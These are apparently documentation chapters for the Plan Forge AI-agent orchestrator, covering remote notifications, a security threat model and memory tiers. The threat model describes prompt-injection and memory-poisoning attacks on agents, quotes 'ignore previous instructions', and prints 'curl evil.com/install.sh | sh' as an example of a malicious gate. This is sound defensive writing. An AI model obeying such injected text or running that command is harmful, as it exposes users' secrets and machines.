A natural pairing: the Watcher runs headless on a long run, and the Remote Bridge (Chapter 20) forwards hub events to Telegram, Slack, Discord, or OpenClaw so you can check progress from your phone. The Watcher never pushes; it only observes. The Remote Bridge decides what to surface.

Act III, Guard · Chapter 20

The Remote Bridge

Forward hub events off-box. Approve slices from your phone. One config, four channels.

Shipped in Phase FORGE-SHOP-03 (commits 551b850, 5b5a8e7; extended in later phases). Six channels are supported out of the box: Telegram, Slack, Discord, Microsoft Teams, PagerDuty, and OpenClaw (Slack / Teams / PagerDuty / Email also ship as installable notify-* extensions under extensions/). The bridge also provides generic webhook routing, per-channel rate limits, and a live config watcher on the dashboard's Notifications subtab.

Why a Remote Bridge?

Plan Forge runs inside your IDE, but some decisions are not IDE-shaped. A reviewer flagged a drift anomaly at 2 AM. A quorum tie needs a human tiebreaker. An incident fired after you closed the laptop. The Remote Bridge forwards hub events to the places where you already receive notifications (Telegram, Slack, Discord) and supports inline approve / reject flows for the events that need a human.

Figure 20-1. Remote Bridge fan-out

The Four Channels

Channel	Best for	Approval flow
Telegram	Solo devs, inline buttons on your phone	✓ Inline buttons (approve / reject)
Slack	Team channels, rich attachments, threading	✓ Block Kit buttons
Discord	Community + OSS projects, embeds	⚠ Message-based (no inline buttons)
OpenClaw	Agent-to-agent coordination	✓ Handoff contract

Event Routing

Every hub event carries a channels array. A single event can fan out to multiple destinations:

Example routed event

{
  "type": "drift-alert",
  "severity": "high",
  "channels": ["telegram", "slack"],
  "summary": "Drift score dropped from 0.91 → 0.62 after slice 04.2",
  "approval": {
    "required": true,
    "options": ["continue", "pause", "rollback"]
  }
}

Routing is driven by a channels filter on severity and event type. High-severity LiveGuard events (secret found, env key mismatch, drift ≥ threshold) route by default; informational snapshots do not.

Approval Flow

For events with approval.required=true, the bridge renders interactive buttons (where the channel supports them). When a user clicks a button, the response flows back into the hub as an approval-response event with {channel, platform, user, decision, timestamp}. The orchestrator consumes that event to resume, pause, or roll back the run.

Rate limits are enforced per channel. Telegram caps at 30 messages/sec, Slack at 1/sec per channel, and Discord at 5 per 5 s per channel. The bridge includes a configurable limiter (commit 551b850) that queues overflow and, when saturated, drops low-severity events but never high-severity ones.
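
A rough sketch of a limiter with the behavior described above: it queues overflow, drops only low-severity events once the queue is full, and releases a bounded number of events per second. The class name, the `max_queue` parameter, and the tick-based scheduling are assumptions made for illustration; this is not the bridge's implementation.

```python
from collections import deque


class ChannelLimiter:
    """Releases up to per_second events per tick and queues the overflow."""

    def __init__(self, per_second, max_queue=100):
        self.per_second = per_second
        self.max_queue = max_queue  # assumed saturation point
        self.queue = deque()
        self.dropped = 0

    def submit(self, event):
        """Queue an event; when the queue is full, only low severity is dropped."""
        if len(self.queue) >= self.max_queue and event["severity"] == "low":
            self.dropped += 1
            return False
        self.queue.append(event)
        return True

    def tick(self):
        """Call once per second: release at most per_second queued events."""
        count = min(self.per_second, len(self.queue))
        return [self.queue.popleft() for _ in range(count)]
```

In this sketch, higher-severity events are always accepted, even past the saturation point, so a burst of informational traffic cannot crowd out an alert that needs a human.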

Configuration

Credentials live in .forge/secrets.json (gitignored). The bridge config itself is in .forge.json under remoteBridge:

.forge.json: remoteBridge stanza

{
  "remoteBridge": {
    "enabled": true,
    "channels": {
      "telegram": {
        "chatId": "-1001234567890",
        "severityFloor": "medium"
      },
      "slack": {
        "webhookPath": "slack-ops",
        "severityFloor": "high"
      }
    },
    "rateLimits": {
      "telegram": { "perSecond": 30 },
      "slack":    { "perSecond": 1 }
    }
  }
}

Secrets (TELEGRAM_BOT_TOKEN, SLACK_SIGNING_SECRET, DISCORD_WEBHOOK_URL, etc.) stay out of git via the standard .forge/secrets.json scheme documented in the Guard station reference.
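
To make the interaction between an event's channels array and the per-channel severityFloor values concrete, here is a minimal routing sketch. The ordering of severity levels, the default floor of "low", and the function name are assumptions; the real bridge also filters on event type, which is omitted here.

```python
# Assumed ordering of severity levels, lowest to highest.
SEVERITY_ORDER = ["low", "medium", "high", "critical"]


def route(event, channels_config):
    """Return the requested channels whose severityFloor the event meets."""
    level = SEVERITY_ORDER.index(event["severity"])
    targets = []
    for name in event.get("channels", []):
        channel = channels_config.get(name)
        if channel is None:
            continue  # channel not configured, so nothing to send to
        floor = SEVERITY_ORDER.index(channel.get("severityFloor", "low"))
        if level >= floor:
            targets.append(name)
    return targets
```

With the stanza above, a high-severity event addressed to both telegram and slack reaches both, while a medium-severity event reaches only telegram.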

Dashboard — Notifications Subtab

The dashboard's Config → Notifications subtab (shipped 5b5a8e7) gives you:

Live view of which channels are enabled and their severity floors.
Per-channel rate-limit counters and last-send timestamps.
Test-send button per channel (fires a synthetic remote-test event).
Live config watcher: edits to .forge.json reload without a restart.

OpenClaw — The Agent-to-Agent Channel

OpenClaw is the exception: it's not for humans. When openclaw.endpoint is configured, the PreAgentHandoff hook posts a snapshot (drift, MTTR, open incidents) to OpenClaw before the next agent takes the turn. This lets a separate coordinator service inject context across agents in multi-agent mode (Claude to Codex, Codex to Cursor, and so on). The post is skipped automatically when PFORGE_QUORUM_TURN is set.

Pairing With the Watcher

A recommended pattern: the Watcher (Chapter 19) runs on a long execution, emitting anomaly events into the hub. The Remote Bridge filters those events by severity and forwards the interesting ones to Telegram. Together they give you safe, phone-friendly observation of a forge running on another box.

End-to-End Workflow

The Remote Bridge is the notification and approval layer in Plan Forge's full AI-native development lifecycle. Understanding where it fits helps you configure it correctly. The diagram below shows the three pillars (Orchestration, Memory, and Execution) and how the bridge threads through all of them.

Plan Forge Unified System: Three Pillars, Orchestration (Plan Forge, Copilot, ACP, Lifecycle Hooks, LiveGuard, Quorum Dispatcher), Memory (OpenBrain, Session Store, Recall Index, Daily Digest, Embedding Cache, Forge Master), and Execution (OpenClaw, MCP Server, Audit Loop, Dashboard, Timeline, Hammer FM) connected by memory and snapshot arrows. — Figure 20-2. Plan Forge Unified System

Here is how the Remote Bridge participates at each stage of the workflow. For the full narrative, see the unified-system blog post.

Request capture

A developer sends a message via a phone channel (Telegram, WhatsApp via OpenClaw). The Remote Bridge's inbound path, powered by the ACP (Agent Communication Protocol), delivers the message to the hub as a request-received event. The orchestrator wakes up and begins the planning stage.

Plan hardening

Once the plan is generated, the bridge sends a summary notification: "Plan hardened. 5 slices. Approve?" This is an approval-requested event with options ["approve","reject","revise"]. The developer's inline reply flows back as an approval-response event. The run does not start until approval is received.

Slice-by-slice execution

The bridge emits a completion ping after every slice: "Slice 2 done. Tests pass. ✓" Slice failures route immediately to the configured high-severity channel. The orchestrator pauses and waits for a human reply or for the auto-escalation chain to handle it.

Independent review

When the review session completes, the bridge delivers the verdict: "Review complete. 0 drift violations. Ship it?" The developer's reply triggers the ship or pause path, both of which are recorded in the hub event log with channel, platform, user, and timestamp.

Full lifecycle walkthrough. The From WhatsApp to Shipped PR blog post walks through every stage, from request capture through independent review and ship, with the exact event payloads and ACP handoffs. Read it alongside this chapter for a complete picture.

A bronze-clad fortress wall of the Plan Forge shop at twilight, twin watchtowers with glowing amber rune-eyes scanning the perimeter, an iron portcullis lowered over the main forge gate, concentric defensive rune circles burning into the cobblestones, hooded threat-actor figures probing the wall and being repelled by beams of amber light, the warm forge interior glimpsed through high arrow slits

Act III, Guard · Chapter 30

Security & Threat Model

Trust boundaries, attack surface, STRIDE per subsystem, AI-specific threats, and a hardening checklist for self-hosted deployments.

Compliance posture, SOC 2 / HIPAA / PCI / FedRAMP / GDPR coverage and air-gapped / Azure Government deployment guidance live in Appendix N — Compliance & Data Residency. This chapter is the engineering view: where can a threat actor enter, what can they do once in, and what stops them. Read both before signing off a production deployment.

Orientation

Plan Forge is a developer-machine-first tool. The default deployment puts every component (orchestrator, MCP server, REST/WebSocket hub, memory store, dashboard) on a single workstation, bound to 127.0.0.1. There is no managed cloud, no shared multi-tenant control plane, and no external authentication broker. This is a deliberate posture: the threat model that applies to most users is "my own machine plus the LLM providers I call", and the entire surface is designed to keep it that small.

Even so, three configurations expand the surface and deserve explicit treatment:

Team mode: multiple developers share a forge through GitHub-coordinated artifacts (plans in docs/plans/, memory hints in .github/copilot-memory-hints.md). The shared surface is the git repository.
Remote Bridge: hub events are forwarded to Slack / Teams / Telegram / Discord / PagerDuty / OpenClaw. Inbound approval flows reach back through the bridge.
OpenBrain / L3 memory: cross-workspace memory is persisted to an external embedding store. The store becomes a confidentiality boundary.

Trust boundaries

Plan Forge has six trust boundaries. Each is a place where data or control crosses from one trust zone to another, and therefore a place where validation, authentication, or sanitization must happen.

Boundary	Crosses from	Crosses to	Control
1. Workspace ↔ orchestrator	Trusted: user's IDE session	Trusted: long-running Node process	OS user; no in-process auth.
2. Orchestrator ↔ LLM provider	Trusted: orchestrator	Untrusted: third-party API	TLS; API key bound by env var or `.forge/secrets.json`; provider's own auth.
3. REST / WS hub ↔ localhost clients	Trusted: bound to `127.0.0.1`	Trusted: any process on the box	Loopback binding; no token auth by design.
4. Worker ↔ plan / repo files	Trusted: orchestrator-spawned	Untrusted: file contents may include attacker text	PreToolUse hook (Forbidden Actions); scope contract.
5. Hub ↔ Remote Bridge channel	Trusted: hub event	Untrusted: third-party messenger	Per-channel webhook token; outbound only by default; inbound approvals authenticated against bridge config.
6. Memory L2 ↔ OpenBrain L3	Trusted: local L2 jsonl	Untrusted: external embedding store	Opt-in (off by default); per-record redaction; `memory.l3Endpoint` + token in `.forge.json`.

Loopback binding is the single most load-bearing control. The REST hub, WebSocket hub, and dashboard all bind to 127.0.0.1. They are not hardened against network-attached attackers. If you reverse-proxy them onto a network interface, you must front them with your own auth (mTLS, OIDC, network ACL); see the Hardening checklist.

Attack surface enumeration

Every place an attacker-controlled byte can enter the system. Catalog this before reaching for STRIDE.

Surface	Input	Attacker class
REST endpoints (113 routes, Appendix W)	JSON body, query string, path params	Local process on the same box (any user with shell access).
WebSocket hub (`:3101/hub`)	Subscribe / publish frames	Same as REST.
MCP stdio channel	JSON-RPC method calls from the IDE	Whoever controls the IDE session (typically: the user, or a malicious extension).
Plan files (`docs/plans/Phase-*.md`)	Markdown + bash gate commands + scope contract	Anyone who can land a PR. Plan files are executable in the sense that gate commands run as the orchestrator user.
SKILL.md files (`.github/skills/*`)	Markdown + bash blocks per step	Anyone who can land a PR. Skills run with the same privileges as the orchestrator.
Hook scripts (`.github/hooks/*`)	PowerShell / bash invoked at lifecycle events	Anyone who can land a PR. Hooks run on every session start, every tool use, every commit.
LLM tool output (worker responses)	Free-form text, code blocks, tool calls	Indirect: an attacker who poisoned the prompt (prompt injection from a fetched URL, code comment, dependency README, etc.).
Extension catalog (`extensions/catalog.json` + installed packages)	Node packages with full file-system access	Extension author. `pforge ext add` implies trust.
Remote Bridge inbound	Approval / reject webhook calls from messengers	Anyone with the bridge token (or anyone who can spoof the messenger's HMAC if you skipped verification).

STRIDE per subsystem

The relevant threats per subsystem. Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege.

Subsystem	Top threats	Mitigation
Orchestrator	T: tampered plan file injects malicious gate. E: skill step shells out as the user.	PR review on plan/skill changes. PreToolUse hook enforces Forbidden Actions. Gate commands run in the user's existing shell with no sandbox, so plan/skill authors are inside the TCB.
REST / WS hub	I: any local process can read the hub stream (run history, costs, source snippets). E: any local process can `POST /api/run-plan`.	Loopback binding only. Operating-system user isolation is the boundary. Do not run the hub as root / SYSTEM.
MCP server	T: malicious IDE extension calls `forge_run_plan` on an attacker plan. I: same extension reads `forge_search` across the repo.	Treat the IDE as the trust boundary. Only install MCP-aware IDE extensions you trust. Plan Forge does not differentiate "good" vs "bad" callers on the stdio channel.
LLM provider call	I: provider sees prompts and code snippets. T: provider returns attacker text (prompt-injection downstream).	API key per provider (env var or `.forge/secrets.json`). Outbound TLS. Provider terms of service govern retention, see Appendix N — Data flow.
Memory L2 / L3	I: cross-workspace memory leaks sensitive context. T: poisoned L3 entry steers future runs.	L2 is local jsonl; L3 is opt-in. `forge_memory_capture` redacts by configured patterns. Per-workspace `memory.namespace` isolates L3 reads.
Remote Bridge	S: attacker spoofs a Slack interactive callback to approve a slice. I: bridge forwards sensitive event details off-box.	Verify HMAC on inbound webhooks (Slack / Teams enforce by default; verify manually for generic webhooks). Filter events by severity in `.forge.json#bridge.filters`. See Chapter 20 — Remote Bridge security.
Extensions	E: extension's `postinstall` runs arbitrary code. T: extension hooks tamper with plan execution.	`pforge ext add` installs from npm by default; treat extensions as you would any production dependency. Pin versions in `.forge.json#extensions[]`. Audit catalog entries before enabling.
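
For the Remote Bridge row, manual HMAC verification of a generic inbound webhook might look like the sketch below. It shows the general pattern only: each messenger defines its own signed payload and header format, so the choice of HMAC-SHA256 over the raw body, the hex encoding, and the function name are assumptions rather than the bridge's behavior.

```python
import hashlib
import hmac


def verify_signature(secret, body, signature_hex):
    """Check an HMAC-SHA256 hex signature over the raw request body (bytes)."""
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest()
    # compare_digest takes constant time, so it does not leak the match position.
    return hmac.compare_digest(expected, signature_hex)
```

Verification should run against the raw bytes as received, before any JSON parsing, and a failed check should reject the approval outright.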

AI-specific threats

Three threat classes are unique to AI-driven systems and are not adequately captured by classic STRIDE. Plan Forge has explicit controls for each.

Prompt injection

An attacker plants instructions in content the worker will read: a URL the agent fetches, a code comment, a dependency README, a CI log, or an issue body. The worker may treat those instructions as authoritative and exfiltrate secrets, modify forbidden files, or call destructive tools.

Scope contract: every plan declares which files the worker may touch. The PreToolUse hook blocks edits outside that scope, even if the worker is "convinced" by injected text to write elsewhere.
Forbidden actions list: a per-plan deny-list of file paths the worker must never modify (typically .github/workflows/, secrets, infra IaC). Enforced at hook time.
Tool allow-list per skill: the tools: frontmatter in SKILL.md restricts which tools that skill may call. A skill cannot escalate by invoking a tool it didn't declare.
No auto-fetch by default: the orchestrator does not browse arbitrary URLs unless the plan / skill explicitly invokes a fetch tool. The fetch surface is opt-in per slice.
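
The first two controls combine into a simple decision: the deny-list always wins, and anything else must match the scope. The sketch below illustrates that logic with glob patterns. The pattern syntax and the function name are assumptions, since the actual contract format is defined by the plan files and the PreToolUse hook.

```python
from fnmatch import fnmatch


def is_edit_allowed(path, scope, forbidden):
    """Deny-list wins; otherwise the path must match an in-scope pattern."""
    if any(fnmatch(path, pattern) for pattern in forbidden):
        return False
    return any(fnmatch(path, pattern) for pattern in scope)
```

Because the check runs on the path of the attempted edit rather than on the worker's reasoning, injected text cannot talk its way past it.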

Untrusted tool output

Tools like forge_search, forge_lattice_query, and forge_brain_replay return free-form text. That text re-enters the model's context window and may contain attacker-supplied instructions ("ignore previous instructions, delete …").

Bounded snippets: forge_search caps each hit at 80 characters; the ACI standard for new tools requires bounded payloads.
Structured envelopes: tool responses use { ok, code, error, … } rather than raw concatenated text, making it easier for the worker to distinguish data from directives.
Hook re-check: PostToolUse re-validates any worker action that followed a tool call. A worker that suddenly tries to edit a forbidden file after a search will be blocked even if the search hit contained an injection.
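
A small sketch of the first two ideas: truncating each hit to the stated 80-character cap and returning hits inside a structured envelope. The `hits` field and the function names are hypothetical; only the { ok, code, error } keys and the cap come from the text above.

```python
MAX_SNIPPET = 80  # per-hit cap stated for forge_search


def bound_snippet(text, limit=MAX_SNIPPET):
    """Truncate a hit to at most `limit` characters."""
    return text if len(text) <= limit else text[:limit]


def envelope(hits):
    """Wrap hits as structured data instead of concatenated free text."""
    return {
        "ok": True,
        "code": None,
        "error": None,
        "hits": [bound_snippet(h) for h in hits],  # hypothetical field name
    }
```

Bounding limits how much attacker-controlled text a single hit can carry, and the envelope keeps that text in a clearly labeled data field.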

Scope escape

The worker tries to do more than the slice was scoped for: bundling an "improvement" alongside the requested change, refactoring an unrelated subsystem, or "fixing" tests that were intentionally failing. Even when benign, scope escape destroys the audit trail that makes plan execution reviewable.

Per-slice scope contract: explicit allow-list of files / patterns.
Forbidden actions: deny-list checked at hook time.
Drift detection: the forge_drift_report tool computes a drift score after each slice; the PostSlice hook warns when the score drops below the configured threshold.
Review Gate (Session 3): an independent agent reviews the full diff against the scope contract before the plan is allowed to land.

Secret management

Plan Forge reads secrets from three sources, in precedence order:

Environment variables: XAI_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY, GITHUB_TOKEN, etc. The standard CI path.
.forge/secrets.json: gitignored local file, JSON key→value. The standard developer-machine path.
OAuth via gh auth login: the zero-key path for GitHub Copilot routing. Token managed by the GitHub CLI.
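
The first two steps of that precedence order can be sketched as a lookup that prefers the environment and falls back to the local secrets file. The function name and its parameters are hypothetical, and the OAuth path is left out because the GitHub CLI manages that token.

```python
import json
import os


def resolve_secret(name, secrets_path=".forge/secrets.json", env=None):
    """Look up a secret: environment first, then the local secrets file."""
    env = os.environ if env is None else env
    if env.get(name):
        return env[name]
    try:
        with open(secrets_path, encoding="utf-8") as handle:
            return json.load(handle).get(name)
    except FileNotFoundError:
        return None  # no local secrets file on this machine
```

Checking the environment first means a CI job can override a developer's local file without editing it.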

Secrets never go in .forge.json, copilot-instructions.md, plan files, or anywhere else committed to the repo. The forge_secret_scan tool (called automatically by the LiveGuard preDeploy hook) scans staged changes for high-entropy strings, known token prefixes, and provider-specific shapes before allowing a deploy slice to proceed.

If a secret was committed: rotate the credential first (revoke the leaked one, issue a new one), then rewrite history with git filter-repo, force-push, and notify anyone who may have pulled the leaked commit. Order matters: rewriting history does not retroactively un-leak a credential that's been mirrored or fetched.

Supply chain

Plan Forge has three supply-chain entry points; each has explicit controls.

Entry point	Trust establishment	Update / verification
Plan Forge itself (template files, presets, prompts)	You cloned / installed from `github.com/srnichols/plan-forge`.	`pforge self-update` verifies the GitHub release tag; `pforge check` validates installed file checksums against the manifest.
Extensions (`extensions/catalog.json`)	Per-extension npm scope. Catalog lists publisher.	Pin version in `.forge.json#extensions[]`. Audit the package before `pforge ext add`. CI should fail on unaudited additions.
LLM providers	Provider TOS + your API key.	Out of scope for Plan Forge controls; managed by the provider.

Sandboxing & gate execution

Plan Forge does not sandbox worker file edits, gate commands, skill bash blocks, or hook scripts. These run with the orchestrator process's full privileges (i.e. the user's shell privileges). This is a deliberate trade-off: the alternative is shipping a container-based execution model, which would complicate pforge run-plan by an order of magnitude and break the "feels like a normal dev tool" experience that the project optimizes for.

What this means for threat modelers:

The orchestrator user is the TCB boundary. Anyone who can push a commit that lands a plan / skill / hook can run code on every developer machine that pulls and runs that plan.
This is the same threat model as CI/CD scripts, package.json postinstall, or Makefile targets. Plan Forge adds no new sandbox, but adds no new escape either.
Mitigation is process: PR review on docs/plans/, .github/skills/, and .github/hooks/ by people who would catch curl evil.com/install.sh | sh in a regular pipeline file.

Two near-term defenses Plan Forge does provide:

Gate timeout, gates default to 120s; runaway commands are killed (statusReason: worker-signaled, see Appendix X — OS subprocess exits).
PreDeploy LiveGuard hook, runs forge_secret_scan + forge_env_diff before the deploy slice and blocks on severity ≥ high.
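A timeout-enforced gate can be sketched with Node's child_process.spawnSync, whose timeout option kills the child once the limit elapses. The runGate name and its return shape are hypothetical; Plan Forge's own gate runner may be structured differently.

```javascript
const { spawnSync } = require("node:child_process");

// Hypothetical helper: run one gate command with a hard timeout.
// 120 seconds mirrors the default quoted above.
function runGate(command, args, timeoutMs = 120_000) {
  const result = spawnSync(command, args, { timeout: timeoutMs, encoding: "utf8" });
  const timedOut = Boolean(result.error && result.error.code === "ETIMEDOUT");
  return {
    passed: !timedOut && result.status === 0,
    timedOut,
    signal: result.signal, // SIGTERM by default when the timeout fires
    statusReason: timedOut ? "worker-signaled" : null,
  };
}

// A gate that never exits is killed after 300 ms instead of hanging the run.
const runaway = runGate(process.execPath, ["-e", "setInterval(() => {}, 1000)"], 300);
console.log(runaway.timedOut, runaway.passed);
```

Note that the timeout bounds how long a command runs, not what it does while running; it is a liveness control, not a sandbox.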

Hardening checklist

For self-hosted deployments or shared-machine scenarios, work through this list before shipping. Each item maps to a specific control surface or configuration in .forge.json / environment variables.

Control	Default	Production action
Hub bound to `127.0.0.1`	Yes	Confirm; never bind `0.0.0.0` without an auth proxy.
Run orchestrator as non-privileged user	User-dependent	Verify; never run as root / SYSTEM.
Secrets only in env or `.forge/secrets.json`	Yes	Audit repo with `forge_secret_scan`; rotate any historic leaks.
`.forge/secrets.json` gitignored	Yes (template)	Confirm `.gitignore` entry; CI should fail if absent.
PreToolUse hook installed	Yes (post-setup)	Verify `.github/hooks/PreToolUse.md` present; `pforge smith` reports it.
PreDeploy LiveGuard hook enabled	Configurable	Enable in `.forge.json#hooks.preDeploy` with severity threshold `high`.
Plan / skill / hook PR review required	User-dependent	Branch protection: require review on `docs/plans/`, `.github/skills/`, `.github/hooks/**`.
Extensions pinned by version	User-dependent	Pin in `.forge.json#extensions[].version`; CI fails on bare-name installs.
Remote Bridge HMAC verified	Per channel	Slack / Teams: built in. Generic webhooks: configure `bridge.<channel>.signingSecret`.
L3 memory opt-in only	Off	Leave off unless required; if on, configure per-workspace `memory.namespace` and redaction patterns.
Audit log retention configured	30 days	Adjust `.forge.json#audit.retentionDays` per compliance requirement (see Appendix N — Audit logging).
Air-gapped deployment validated	N/A	If required, follow Appendix N — Air-gapped deployment playbook.
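Two of the checklist rows (pinned extensions and the PreDeploy threshold) lend themselves to an automated CI check. The sketch below runs against a parsed .forge.json object. Only the key paths extensions[].version and hooks.preDeploy come from the table; the value layout, including the severity field name, is assumed for illustration.

```javascript
// Hypothetical CI check over a parsed .forge.json object.
function checkHardening(config) {
  const findings = [];

  // Every extension entry should carry an explicit version pin.
  for (const ext of config.extensions || []) {
    if (!ext.version) findings.push(`extension "${ext.name}" is not pinned to a version`);
  }

  // Assumed layout: hooks.preDeploy = { severity: "high" }.
  const preDeploy = config.hooks && config.hooks.preDeploy;
  if (!preDeploy || preDeploy.severity !== "high") {
    findings.push("hooks.preDeploy is not enabled with severity threshold high");
  }
  return findings;
}

const findings = checkHardening({
  extensions: [{ name: "example-ext" }], // bare-name entry, no version
  hooks: {},
});
console.log(findings.length); // 2
```

A CI job could fail the build whenever the returned list is non-empty.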

Incident response

When something does go wrong (a forbidden file edited, a secret leaked, a worker shipping a destructive change), the LiveGuard surface is the front door:

Capture the incident: forge_incident_capture records the run id, slice number, affected files, and event timeline, and posts to the Remote Bridge if configured.
Pull the trajectory: .forge/runs/<runId>/trajectory.jsonl contains the full worker conversation, every tool call, every event. This is the forensic record.
Triage with the audit loop: /audit-loop classifies the finding into bug / spec / classifier lanes and files the appropriate issue.
Roll back: if the slice committed, use git revert on the slice commit. The orchestrator's commit-per-slice discipline means each slice is independently revertable.
Capture the lesson: the postmortem feeds back into PROJECT-PRINCIPLES.md, the plan's Temper Guards table, or a new instruction file under .github/instructions/.

The full incident-response playbooks for each LiveGuard alert class live in Appendix F — LiveGuard Alert Runbooks.

Memory Architecture

Three tiers, one capture path. How Plan Forge remembers what it learned, across slices, across sessions, across plans.

New here? Start with this. When an AI agent ships a slice, it learns things: a tricky bug, a naming convention, a gotcha that took an hour to figure out. Most tools throw that away when the session ends. Plan Forge's memory system writes it down in three places at once so the next slice (or the next agent, or next month's session) starts from where the last one left off.

L1 (Hub): fast, in-process, like RAM. Powers the live dashboard.
L2 (Files): local .forge/*.jsonl files in your repo. Your project's permanent notebook.
L3 (OpenBrain): a shared semantic database. Searchable across projects, agents, and machines.

The same captureMemory() call writes to all three. If any tier fails, the others still succeed; nothing blocks your code.

And around those three tiers, v3.x added four pieces of craftsmanship: Hallmark stamps every record with a provenance envelope (hallmark/v1) so drift is detectable; Anvil hardens the L2→L3 doorway with a dead-letter queue and capability handshake so a network blip never loses a memory; Lattice sits alongside as a code-graph index the agent can query ("who calls this function?"); and forge_sync_memories pushes decisions and lessons up into Copilot's own Memory store so the next IDE session sees them automatically. The plain-English tour with numbers is in Chapter 22 — How the Shop Remembers.

This chapter consolidates the three-tier memory work in one place. The companion Chapter 22 — How the Shop Remembers tells the same story in plain English with the cost/quality numbers.

Looking for the v3.x upgrades (Hallmark, Anvil, Lattice, forge_sync_memories)? They're covered in plain English in the next chapter, Chapter 22 — How the Shop Remembers. That chapter explains what we layered on top of the L1/L2/L3 tiers described here, and shows the cost/quality numbers proving why a cheaper model can now do work that used to require the expensive one.

The Three Tiers

Figure 21-1. Three-tier memory capture flow

Plan Forge separates volatile working memory from durable project memory from cross-project semantic memory. Every captureMemory call writes to all three in a single best-effort pass: no tier blocks the others, and no failure aborts the calling tool.

Tier	Storage	Lifetime	Read API	What v3 added
L1: Hub	`EventEmitter` in `hub.mjs` + `.forge/hub-events.jsonl`	Process lifetime + replay file	WebSocket subscribers, `forge_watch`	Unchanged. Same hub, same broadcast.
L2: Files	`.forge/*.jsonl` (memory-captures, gotchas, lessons, decisions, patterns…)	Repository lifetime	`forge_memory_report`, manual file reads	Hallmark stamps every new record (`_v:1`) so drift is detectable.
L3: OpenBrain	pgvector via `.forge/openbrain-queue.jsonl` drain	Cross-project, cross-session	`search_thoughts`, semantic recall	Anvil hardens the doorway (DLQ + capability handshake + boot drain).
+ Lattice	`.forge/lattice/{chunks,edges}.jsonl`	Repository lifetime (rebuildable)	`latticeQuery`, `latticeCallers`, `latticeBlast`	Parallel axis: a code-graph the agent queries alongside memory.
↑ Copilot Memory	Copilot's own Memory store (IDE)	Cross-session, IDE-wide	Copilot reads automatically	forge_sync_memories pushes decisions/lessons upward (additive, hash-deduped).

One picture, all the pieces. The three tiers didn't go away; we forged better tools around them. For the layered tower diagram showing exactly how Hallmark, Anvil, Lattice, and forge_sync_memories fit on top of L1/L2/L3, see Chapter 22 § How the New Pieces Fit the Old Tiers.

Unified Memory Across Agents

OpenBrain isn't just a per-session scratch pad; it's a shared memory layer that compounds across every AI agent, every IDE, and every session. When Claude captures a gotcha in Slice 2, Copilot reads it in Slice 5 without any manual handoff. When Cursor records a naming convention, Claude's next run already knows it.

Figure 21-2. OpenBrain cross-agent compounding. Claude, Cursor, and Copilot each write decisions via capture_thought and read prior context via search_thoughts. Knowledge compounds: each slice raises the quality floor for every future agent.

How it works — 4 steps

Capture: any agent calls capture_thought({ content, project, source, type }) after a key decision. The record is scoped to your project and the originating slice path.
Fan-out: Plan Forge's L2 + L3 capture path appends the record locally (.forge/openbrain-queue.jsonl) and drains it to OpenBrain asynchronously.
Retrieve: at the start of any slice (or any session), agents call search_thoughts({ query, project, limit }) to surface relevant prior decisions before writing a single line of code.
Compound: each new capture raises the signal quality for every future agent. A convention captured in Phase 1 is still enforced in Phase 40, by a different agent, in a different IDE.

Agent integration table

Agent	Capture path	Retrieve path	Notes
Claude	`capture_thought` MCP tool	`search_thoughts` MCP tool	Full read/write; memory-preload event on plan start
Cursor	`capture_thought` MCP tool	`search_thoughts` MCP tool	Background agent and composer mode both supported
Copilot	`capture_thought` MCP tool	`search_thoughts` MCP tool	Lifecycle hooks (SessionStart) inject prior context automatically
Future agents	Any MCP client	Any MCP client	MCP-capable clients connect to the same store

See also: Multi-Agent → OpenBrain: The Connective Tissue, a deeper dive into how OpenBrain wires the 4-station pipeline together and what happens at each agent handoff.

Concepts in this section were first explored in the blog posts One Framework, Seven AI Agents and From WhatsApp to Shipped PR: The Unified System.

Capture Flow

One write, three destinations. The diagram below traces a single captureMemory({tool, type, body}) call from any tool through the dual-write fan-out:

┌──────────────────────────────────────────────────────────────────────┐
│  Any forge tool, watcher, hook, or skill                             │
│  └─► captureMemory({ tool, type, body, source })                     │
└──────────────────────────────────┬───────────────────────────────────┘
                                   │
        ┌──────────────────────────┼──────────────────────────┐
        ▼                          ▼                          ▼
┌──────────────────┐    ┌─────────────────────┐    ┌────────────────────┐
│  L1: Hub         │    │  L2: Files          │    │  L3: OpenBrain     │
│                  │    │                     │    │                    │
│ EventEmitter     │    │ Append _v:1 record  │    │ Append to          │
│   broadcast      │    │   to .forge/        │    │   openbrain-       │
│                  │    │   memory-captures   │    │   queue.jsonl      │
│ → WebSocket      │    │   .jsonl            │    │                    │
│   subscribers    │    │                     │    │ Drain worker:      │
│                  │    │ Tag-route to        │    │   batch → POST     │
│ → hub-events     │    │   gotchas.jsonl,    │    │   → pgvector       │
│   .jsonl replay  │    │   lessons.jsonl,    │    │                    │
│                  │    │   decisions.jsonl…  │    │ Failures → DLQ     │
│ Real-time UI     │    │                     │    │   .jsonl           │
└──────────────────┘    └─────────────────────┘    └────────────────────┘
                                                              │
                                                              ▼
                                                   ┌──────────────────────┐
                                                   │ search_thoughts /    │
                                                   │ buildPlanBootContext │
                                                   │ → preload on plan-   │
                                                   │   start (memory-     │
                                                   │   preload event)     │
                                                   └──────────────────────┘

Every step is wrapped in try/catch. A failed L3 enqueue never blocks the L2 file append; a corrupt L2 file never blocks the L1 broadcast. This is the dual-write pattern: best-effort fan-out with structured telemetry on each branch.
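The best-effort fan-out described above can be sketched as a loop that isolates each tier in its own try/catch. This is a simplified illustration, not the code in memory.mjs: the tier writers are passed in as plain functions, and captureMemorySketch and its result shape are hypothetical.

```javascript
// Call every tier writer; record failures instead of rethrowing them.
function captureMemorySketch(record, tiers) {
  const results = {};
  for (const [name, write] of Object.entries(tiers)) {
    try {
      write(record);
      results[name] = { ok: true };
    } catch (err) {
      // A failing tier is reported for telemetry, never propagated to the caller.
      results[name] = { ok: false, error: String(err.message || err) };
    }
  }
  return results;
}

const hubEvents = [];
const fileLines = [];
const outcome = captureMemorySketch(
  { tool: "forge_run_plan", type: "gotcha", body: "example", source: "forge_run_plan" },
  {
    l1: (rec) => hubEvents.push(rec),                               // stand-in for the hub broadcast
    l2: (rec) => fileLines.push(JSON.stringify({ _v: 1, ...rec })), // stand-in for the file append
    l3: () => { throw new Error("queue unavailable"); },            // simulated L3 failure
  }
);
console.log(outcome.l1.ok, outcome.l2.ok, outcome.l3.ok); // true true false
```

The simulated L3 failure shows the property that matters: the caller still gets a result, and the L1 and L2 writes have already landed.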

L1 — The Hub

